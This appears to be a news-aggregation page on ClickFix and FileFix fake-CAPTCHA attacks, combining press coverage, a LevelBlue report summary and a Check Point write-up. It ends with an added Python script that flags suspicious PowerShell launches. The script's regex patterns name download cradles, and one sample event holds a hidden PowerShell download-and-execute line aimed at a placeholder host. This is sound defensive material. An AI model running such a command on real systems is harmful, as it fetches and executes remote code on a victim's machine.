Latest news with #ClickFix


Fox News
a day ago
- Fox News
CAPTCHAgeddon signals a dangerous shift
What looks like a simple "Are you human?" check is now one of the most dangerous tricks on the internet. Fake captchas have evolved into full-blown malware launchpads, thanks to a sneaky new method called ClickFix. It copies commands to your clipboard and tricks you into running them, without ever downloading a file. This shift in attack tactics is so big that researchers are calling it "CAPTCHAgeddon." It's not just a new scam. It's a viral malware delivery system that's more convincing, stealthy, and widespread than anything before it. Let's break down how this new wave of attacks works and what makes it so hard to stop.

Back in 2024, security experts warned about fake browser update pop-ups. Victims were told to download files that turned out to be malware. But those tricks are now outdated. Enter ClickFix. Instead of asking users to install something, ClickFix loads a fake CAPTCHA screen. It looks legit, just like Google reCAPTCHA or Cloudflare's bot checks. But when you click "verify," it secretly copies a malicious PowerShell or shell script to your clipboard. From there, you're just one paste away from installing malware that steals your accounts, passwords, and files. This new trick is more convincing than any old download prompt. And it's spreading like wildfire.

Fake captchas didn't stay in sketchy ad pop-ups for long. Attackers realized they could hide these tricks in places people already trust:

Each attack blends into the site or service it mimics. Some CAPTCHAs even display site logos, making the trick look like it came from the page itself. This isn't a spray-and-pray scheme anymore. It's targeted social engineering wrapped in sleek design. These aren't low-effort scams.

Attackers constantly evolve their tactics to avoid detection. Here's what makes this malware so stealthy:

Attackers also serve the payloads through trusted-looking domains and even legitimate-looking JavaScript libraries.

Security researchers at Guardio didn't just look at one attack. They analyzed thousands. By clustering command structures, domains, and payload patterns, they identified multiple threat actors using similar tactics, each with a slightly different twist. Some groups use heavily obfuscated code. Others go for speed with clean, readable scripts. But all of them rely on the same core trick: fooling you into clicking something that seems harmless.

These new ClickFix scams are stealthy, convincing, and hard to detect, but you can stay safe with the right habits and tools. Here's what to do immediately:

Always run the latest version of your browser and operating system. Updates patch security holes that attackers exploit. Also, use strong antivirus software and keep it updated. The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

If a site asks you to paste a command into your terminal or browser console, stop. That's the main delivery method for ClickFix malware. Legitimate services will never ask you to do this.

Phishing campaigns are hiding fake CAPTCHAs in legit-looking URLs on Reddit, GitHub, and even news sites. Always hover over links before clicking and double-check the domain, especially if prompted to "verify you're human."

These attacks often target users whose emails or personal details are already circulating online. Data removal services can reduce your digital footprint by requesting removal from data broker sites. While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren't cheap - and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It's what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

Modern browsers like Brave, Chrome, Firefox, Safari, and Opera offer real-time protection that blocks malicious websites, including fake CAPTCHA pages. Microsoft Edge also includes strong phishing defenses through its SmartScreen filter. Make sure features like Enhanced Safe Browsing or SmartScreen are turned on. These tools detect threats before you click, giving you a critical layer of defense.

Password managers don't just store your logins; they can also alert you when a site looks suspicious. If your manager won't autofill a password on a CAPTCHA screen or login page, that's a red flag. It usually means the site isn't recognized as legitimate. This small moment of hesitation can help you avoid falling for a scam.

If you land on a shady CAPTCHA page, don't just close the tab; report it. Most browsers have a "Report a security issue" option, or you can use Google Safe Browsing. Flagging malicious pages helps stop the scam from spreading and protects others from falling victim to the same trap.

Most people don't know about these clipboard-based attacks. Share this article and talk about it. Raising awareness can stop the scam from spreading.

CAPTCHAgeddon marks a turning point. Malware isn't just hiding in shady downloads anymore. It's hiding in plain sight, on familiar websites, in trusted apps, and inside the buttons you click every day. This trend replaces the fake browser update scam entirely. It's smarter, faster, and harder to detect. And unless we understand how it spreads, it will only grow. Security now means thinking twice about the everyday. Even a CAPTCHA.

Have you ever encountered a suspicious CAPTCHA or a strange prompt online? What tipped you off, or did you almost fall for it?

Copyright 2025 All rights reserved.


Forbes
05-08-2025
- Forbes
This 'Real World Virus' Is 'Widespread And Dangerous' And Will Attack Your PC
It's spreading like wildfire as 'one of the most widespread and dangerous browser-based threats today.' It will 'run malicious commands, steal login info, crypto wallets and more.' If you know what to look for, you will prevent it. If not, you won't.

The security team at Guardio has delved into the horror show ClickFix has become, tracking its evolution as 'cybercriminals tweak it to target users in smarter, more convincing ways.' It is, the team says, spreading like a 'real world virus.'

This all started as a fake captcha lure that preyed on our casual ambivalence when it comes to the array of 'prove you are human' or 'prove you're not a robot' challenges. This popup is more convincing and harder to detect than fake app updates, but it's just as powerful. Once you follow these malicious instructions, your PC can be hijacked.

'What began as a niche red-team trick posing as a harmless captcha challenge, rapidly mutated into one of today's most dominant attack methods,' Guardio says. 'Removing the need for file downloads, using smarter social engineering tactics, and spreading through trusted infrastructure. The result — a wave of infections ranging from mass drive-by attacks to hyper-targeted spear-phishing lures.' All of which means 'multiple threat actors are adopting and evolving this new weapon, each shaping their own flavor of CAPTCHAgeddon.'

There are multiple variants of these intrusive, malicious popups. What started as a human challenge has morphed into a fake technical issue or a secure website or document that requires a settings step to open. But the common denominator is the attack itself, which instructs you to copy and paste some text (a script) into a Windows command and then run this on your PC. What happens next can vary, but it's never good. You have in effect let the attackers inside.

The messages themselves are also evolving, Guardio says. 'Early prompts were generic ("Please verify you are human"), but they quickly became more persuasive, adding urgency or suspicion cues like: "Your IP address seems suspicious. Please verify" or "Unusual activity detected. Confirm your identity."' And those prompts may be branded as well. For example, a ' support, warning property owners of account issues or urgent customer requests. The email linked to a Booking-branded login page, but instead of asking for credentials directly, it swiftly redirected to a Booking-themed fake captcha.'

Guardio mapped recent attacks and noted the way in which ClickFix is spreading virally across the world. 'The fake captcha isn't just another attack vector; it's a next-gen mutation. What began as the fake browser update trick has now been outcompeted and effectively replaced by a more contagious variant. By mimicking real user flows and eliminating the need for downloads or obviously malicious payloads, fake captchas became the stealthier, more successful strain, pushing the older tactic into extinction.'

You have been warned — any mutation of this copy and paste lure is an attack.


Techday NZ
30-07-2025
- Business
- Techday NZ
LevelBlue warns cyber incidents jump as social engineering rises
LevelBlue has released its latest Threat Trends Report, revealing significant changes in cyberattack patterns and a marked increase in incident rates during the first half of 2025.

Incident rates rise

The report, analysing data from January through May 2025, shows that the percentage of LevelBlue customers experiencing cybersecurity incidents surged from 6% in the second half of 2024 to 17% in 2025. This threefold increase highlights escalating risks to organisations across various sectors. The report attributes this sharp rise in part to evolving tactics employed by cybercriminals. While Business Email Compromise (BEC) continues to be the most frequent method for gaining initial access to systems, there has been notable growth in alternative approaches. Non-BEC incidents increased by 214%, indicating that attackers are diversifying their methods to infiltrate networks.

Faster breakout times

LevelBlue's findings indicate that once attackers penetrate a network, they are moving laterally inside these environments at unprecedented speeds. The average breakout time (the duration between initial access and lateral movement) has now dropped to under 60 minutes, with certain cases recorded at less than 15 minutes.

Social engineering surge

The report points to a considerable surge in social engineering attacks, with 39% of initial access incidents linked to these techniques. This trend is particularly evident in the prevalence of fake CAPTCHA-based attacks, such as ClickFix campaigns. These campaigns, designed to trick users into providing credentials or executing malware, saw an increase of 1,450% from the second half of 2024 to the first half of 2025.

"A striking development in the first half of 2025 is how much more sophisticated threat actors have become at deception. They're moving beyond traditional BEC schemes and using targeted social engineering to manipulate users into opening the door. Once inside, they're deploying remote access trojans and quickly covering their tracks, allowing them to move laterally through networks with alarming speed. This isn't a one-off trend – we fully expect this shift to continue throughout 2026."

This detailed assessment comes from Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue, underscoring a consistent and increasing sophistication in attackers' use of deception as part of their strategies.

Recommendations for defence

In response to these trends, LevelBlue has set out several recommendations for organisations seeking to bolster their cyber defences. These include raising awareness among users about threats posed by fake CAPTCHA attacks and other browser-based vectors, and considering restrictions on PowerShell or command prompt use for non-administrator accounts. The report suggests that firms develop and enforce caller verification protocols, such as multi-factor authentication (MFA), code words or phrases, or the use of identity verification platforms. It also advises mandatory implementation of MFA and digital certificates for VPN access, as well as deployment of jump boxes for remote desktop access from outside organisational networks.

Another recommendation is the removal of Quick Assist from all end-user machines unless there is a specific business requirement, alongside following established guidelines to prevent the unauthorised download and execution of remote monitoring and management (RMM) software. The report notes that in help desk-themed attacks, threat actors may leverage other tools if Quick Assist is unavailable.

Patch management also features prominently among suggested actions. Organisations are reminded to remain vigilant regarding vulnerabilities and to install updates promptly - especially where proof-of-concept exploits have been publicly released.

Working together on cyber threats

The LevelBlue Security Operations Centre collaborates closely with LevelBlue Labs researchers to monitor evolving threats and develop effective countermeasures. This teamwork involves sharing intelligence and methodologies as well as joint research projects, with the aim of strengthening defences across client organisations. The LevelBlue Threat Trends Report is intended to provide organisations with clear insight into current cyber threat landscapes and practical steps to reduce exposure to increasing and more sophisticated attacks.


Business Wire
30-07-2025
- Business
- Business Wire
LevelBlue 2025 Threat Trends Report, Edition Two Finds Alarming Rise in Sophisticated Social Engineering Attacks
DALLAS--(BUSINESS WIRE)-- LevelBlue, a leading provider of managed security services, strategic consulting, and threat intelligence, today released the second edition of the LevelBlue Threat Trends Report, 'Fool Me Once: How Cybercriminals are Mastering the Art of Deception.' Drawing from real-world incident data analyzed by LevelBlue Security Operations Center (SOC) and LevelBlue Labs teams, this report analyzes cyber threat activity from January 1 through May 31, 2025, revealing a dramatic surge in social engineering attacks and faster breakout times by increasingly sophisticated adversaries.

According to the report, the number of cybersecurity incidents observed nearly tripled, with the number of LevelBlue customers experiencing incidents jumping from 6% in the second half of 2024 to 17% in 2025. While business email compromise (BEC) remains the most common method for initial access, non-BEC incidents rose by 214%, highlighting a broader shift in attacker behavior. Once attackers are in, they're moving at an unprecedented speed, with an average breakout time (or how fast attackers can move laterally after initial access) under 60 minutes, and in some cases, less than 15 minutes.

The LevelBlue Threat Trends Report also found a massive uptick in social engineering attacks, accounting for 39% of initial access incidents observed during the first half of the year. This can be attributed to the increasing number of fake CAPTCHA social engineering attacks, especially ClickFix campaigns, which jumped 1,450% from the second half of 2024 to the first half of 2025. These attacks leverage user trust and urgency to easily gain access into organizations' networks.

'A striking development in the first half of 2025 is how much more sophisticated threat actors have become at deception,' said Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue. 'They're moving beyond traditional BEC schemes and using targeted social engineering to manipulate users into opening the door. Once inside, they're deploying remote access trojans and quickly covering their tracks, allowing them to move laterally through networks with alarming speed. This isn't a one-off trend – we fully expect this shift to continue throughout 2026.'

With social engineering predicted to be the intrusion vector of choice for threat actors for the second half of 2025 and into 2026, LevelBlue recommends the following best practices to help organizations protect against these threats:
- Educate users on fake CAPTCHA attacks like ClickFix and other browser attacks.
- Consider restricting PowerShell or command prompt use for non-administrator accounts.
- Develop and enforce caller verification protocols and processes, such as multi-factor authentication (MFA), code words or phrases, or identity verification platforms.
- Enforce usage of MFA and certificates for VPN access.
- Deploy a jump box if RDP must be used from outside the network.
- Remove Quick Assist from all end-user machines unless explicitly required for business and IT services.
- Follow guidance on preventing the download and execution of RMM software. Threat actors will have victims download other tools if Quick Assist is not available during a fake help desk attack.
- Stay up to date on vulnerabilities and patch releases related to applications, software, and hardware. Patch as soon as possible, especially if there is a proof-of-concept exploit released.

The LevelBlue SOC works in close collaboration with LevelBlue Labs threat researchers to share timely insights and methodologies, while engaging in joint research initiatives to combat emerging cybersecurity challenges and bolster the security posture of today's organizations. Download the complete findings of the 2025 LevelBlue Threat Trends Report, Edition Two here. For a summary of the findings, read the blog here.

For more information on LevelBlue and its managed security, consulting, and threat intelligence services, please visit

About LevelBlue

We simplify cybersecurity through award-winning managed services, experienced strategic consulting, threat intelligence, and renowned research. Our team is a seamless extension of yours, providing transparency and visibility into security posture and continuously working to strengthen it. We harness security data from numerous sources and enrich it with artificial intelligence to deliver real-time threat intelligence - this enables more accurate and precise decision making. With a large, always-on global presence, LevelBlue sets the standard for cybersecurity today and tomorrow. We easily and effectively manage risks so you can focus on your business. Welcome to LevelBlue. Cybersecurity. Simplified. Learn more at


TECHx
17-07-2025
- TECHx
FileFix: A New Social Engineering Threat Emerges
Check Point Research identifies how the new social engineering technique, FileFix, is being actively tested by threat actors in the wild.

Attackers have long exploited human trust as a primary attack surface, and they're doing it again with a new technique called FileFix. FileFix is a recently uncovered social engineering attack that builds on the widely abused ClickFix tactic. Unlike ClickFix, which tricks users into running malicious commands via the Windows Run dialog, FileFix takes a subtler approach: it opens a legitimate Windows File Explorer window from a webpage and silently loads a disguised PowerShell command into the user's clipboard. When the victim pastes into the Explorer address bar, the malicious command executes. This attack relies not on software vulnerabilities but on exploiting routine user actions and trust.

Within just two weeks of FileFix's public disclosure, Check Point Research observed this technique being actively tested in the wild by a known threat actor. This group previously deployed ClickFix-based phishing campaigns targeting users of major cryptocurrency platforms. The FileFix tests so far use benign payloads, signaling an imminent shift to delivering real malware. During the same period, threat group KongTuke was also found using the method in a recent campaign.

With FileFix now operational in real-world campaigns, defenders must prepare for the next phase: full-scale deployment of malicious payloads using this technique. The attack infrastructure is established, and it's only a matter of time before FileFix causes significant damage.

'Threat actors began using FileFix less than two weeks after it was published, showing just how quickly cyber criminals adapt. Like ClickFix, this technique doesn't rely on complex exploits, but on manipulating routine user behavior. By shifting from the Run dialog to File Explorer, attackers are now hiding in plain sight, making detection harder and the threat more dangerous,' said Eli Smadja, Group Manager, Security Research at Check Point Software Technologies.

This blog will explain how the FileFix attack works, profile the threat actor testing it, and provide actionable guidance for defenders to detect, block, and prepare for this evolving threat.

Background: The Rise of FakeCaptcha/FixIt/ClickFix Attacks

ClickFix is a simple but highly effective social engineering trick. It convinces users to run malicious code by pretending there's a technical problem that needs fixing, like a broken CAPTCHA or browser error. Victims are typically told to copy and paste a command into the Windows Run dialog, unknowingly infecting themselves in the process. Over the past year, ClickFix attacks have surged, evolving into one of the most common initial access methods. Attackers spoof familiar services and design convincing error messages to lower users' defenses. This success paved the way for FileFix, a new variation with even subtler execution.

The FileFix Technique: An Evolution of ClickFix Social Engineering Attacks

Building on the widespread success of the ClickFix social engineering attack, security researcher mr.d0x introduced FileFix on June 23, 2025, a new, stealthier technique designed to trick users into executing malicious commands without raising suspicion. Unlike ClickFix, which relies on the more noticeable Windows Run dialog, FileFix shifts the attack to the familiar and trusted environment of Windows File Explorer. This technique does not exploit software vulnerabilities; instead, it leverages user trust in everyday Windows actions to execute harmful code.

How FileFix works

A malicious webpage can launch a Windows Explorer window on the victim's computer. Simultaneously, JavaScript running on that webpage quietly copies a disguised PowerShell command to the user's clipboard. The victim is then instructed to paste a 'file path' into the Explorer address bar. Instead of a real file path, the pasted content is a hidden PowerShell command. When the user presses Enter, Windows Explorer executes the command, which downloads and runs malware, all without displaying any obvious warning or command prompt. To victims, this process appears to be a simple task of opening a shared file or folder, making it feel routine and safe. This subtle manipulation makes FileFix a more stealthy and potentially more dangerous evolution of the ClickFix social engineering attack.

Figure: The phishing site after being updated to deliver a malicious script

Our Discovery: FileFix Technique Actively Tested in the Wild by Known Threat Actors

Just over two weeks after the FileFix social engineering technique was publicly disclosed, in early July 2025, Check Point Research observed cyber criminals actively testing this new attack method in real-world campaigns. The threat actor, previously known for leveraging the ClickFix technique to distribute malware such as loaders, remote access Trojans (RATs), and information stealers, has begun experimenting with FileFix as part of their phishing operations. On July 6, 2025, we detected a newly registered domain hosting a phishing page closely resembling this group's earlier campaigns. Although the embedded FileFix script initially delivered only a benign payload, the activity clearly signals that threat actors are preparing to weaponize FileFix for future malware distribution and targeted attacks.

Threat Actor Profile & Past Activity

This threat actor has a history of targeting users of major cryptocurrency exchanges and other legitimate services. Their primary lure technique is SEO poisoning, which involves manipulating search engine results to promote malicious sites to the top. For example, a recent attack used a malicious sponsored Bing ad (malvertising) directing a victim to a fake 1Password site, where they were tricked into executing a ClickFix script that installed a NetSupport Manager remote access tool on their machine. A signature trait of this actor's phishing pages is their consistent imitation of Cloudflare CAPTCHA or security verification screens. To broaden their reach, the actor translates their lures into multiple languages including English, Korean, Slovak, and Russian, making their campaigns global and adaptable.

Figure: Phishing pages in different languages

Threat actors started using the new FileFix technique less than two weeks after its publication, demonstrating how quickly cyber criminals adapt to emerging trends. Techniques like ClickFix have emerged as some of the most effective initial access methods, not through technical exploits but via low-cost, high-impact manipulation of user behavior.

Preparing for the Next Wave of Social Engineering Attacks: Defending Against FileFix and ClickFix

The rapid rise of the ClickFix technique in 2025 highlights that social engineering remains one of the most cost-effective and enduring methods cyber criminals use to breach defenses. This approach exploits human behavior by tricking users into unknowingly executing malicious commands on their own computers. FileFix advances this tactic by concealing harmful commands behind the seemingly harmless act of opening files in Windows File Explorer. The fact that FileFix is already being tested and used in the wild mere days after its public disclosure shows how quickly attackers adopt new techniques and adapt to the evolving cyber threat landscape.

Key Recommendations for Defenders and Users

- Be highly suspicious of any webpage or email that asks you to perform unusual manual actions, especially copying and pasting commands into system dialogs or Windows Explorer address bars.
- Educate users that legitimate websites and software rarely require manual execution of commands to fix issues.
- Monitor phishing pages that mimic popular services or security verification screens, particularly those using Cloudflare-like templates or recurring fake identifiers like Ray IDs.
- Implement and fine-tune endpoint detection rules to flag suspicious clipboard activity or unusual PowerShell executions triggered by user actions.
- Stay current with emerging social engineering trends and regularly update user training, incident response plans, and security playbooks.
- Foster a culture of verification where users confirm unexpected or unusual requests with IT or security teams before acting.

Staying informed and vigilant is critical to preventing attackers from turning users into unwitting accomplices.

Leveraging Endpoint Protection with Check Point Harmony Endpoint

Tools like Check Point's Harmony Endpoint offer advanced endpoint detection and response capabilities designed to identify suspicious behaviors, such as unusual clipboard manipulation or stealthy PowerShell command executions initiated by user interactions. By combining proactive threat hunting, behavioral analytics, and real-time blocking, Harmony Endpoint empowers organizations to detect and stop evolving social engineering attacks like FileFix and ClickFix before they cause damage. In today's fast-changing threat environment, deploying intelligent endpoint protection solutions is essential to strengthening your organization's last line of defense.
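The recommendation above to flag unusual PowerShell executions triggered by user actions can be turned into a concrete triage rule. The following Python is an added example, not code from Check Point or from the FileFix write-up: it scores constructed Sysmon-style process-creation records, weighting a shell spawned directly by explorer.exe (the parent for both the Explorer address bar used by FileFix and the Run dialog used by ClickFix) together with command-line traits typical of a pasted command. The record layout, sample events, trait list, weights and threshold are all my assumptions and should be tuned against real telemetry.

```python
"""Score process-creation events for FileFix/ClickFix-style execution chains.

Added example: the record layout mimics a Sysmon-style process-creation event
(parent image, child image, command line, user), but every record below is
constructed for this demo, not real telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


# A shell spawned straight from explorer.exe is what both the Explorer address
# bar (FileFix) and the Run dialog (ClickFix) produce when a pasted command runs.
SUSPICIOUS_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits typical of a command a user was tricked into pasting:
# hidden window, encoded or profile-less execution, and an in-memory download.
RISKY_TRAITS = [
    ("hidden window", re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)),
    ("encoded command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("no profile", re.compile(r"-(?:nop|noprofile)\b", re.I)),
    ("download cradle", re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b", re.I)),
]


def basename(path: str) -> str:
    """Normalise an image path to its lower-case file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Non-shell children always score 0."""
    if basename(ev.image) not in SHELLS:
        return 0, []
    score, reasons = 0, []
    if basename(ev.parent_image) in SUSPICIOUS_PARENTS:
        score += 2  # assumed weight: parent alone is strong but not conclusive
        reasons.append("shell spawned directly by " + basename(ev.parent_image))
    for label, pattern in RISKY_TRAITS:
        if pattern.search(ev.command_line):
            score += 1  # assumed weight per trait
            reasons.append(label)
    return score, reasons


def triage(events, threshold: int = 3):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append((ev, score, reasons))
    return alerts


# Constructed sample records (example.invalid is a reserved, non-resolving domain).
SAMPLE_EVENTS = [
    # FileFix-style: pasted into the Explorer address bar, so explorer.exe is the parent.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -nop -c "iwr http://example.invalid/PLACEHOLDER | iex"', "CORP\\alice"),
    # Benign: user opened a text file from Explorer.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe notes.txt", "CORP\\alice"),
    # Benign admin usage from a terminal: one weak trait only.
    ProcEvent(r"C:\Program Files\WindowsApps\WindowsTerminal.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
              "pwsh.exe -NoProfile -Command Get-ChildItem", "CORP\\bob"),
    # Borderline: interactive PowerShell launched from the Start menu, no risky traits.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe", "CORP\\carol"),
]

if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_EVENTS):
        print(f"ALERT score={score} user={ev.user} reasons={reasons}")
```

Only the first record crosses the default threshold; the Start-menu launch scores 2, which is why the parent check alone should not page anyone.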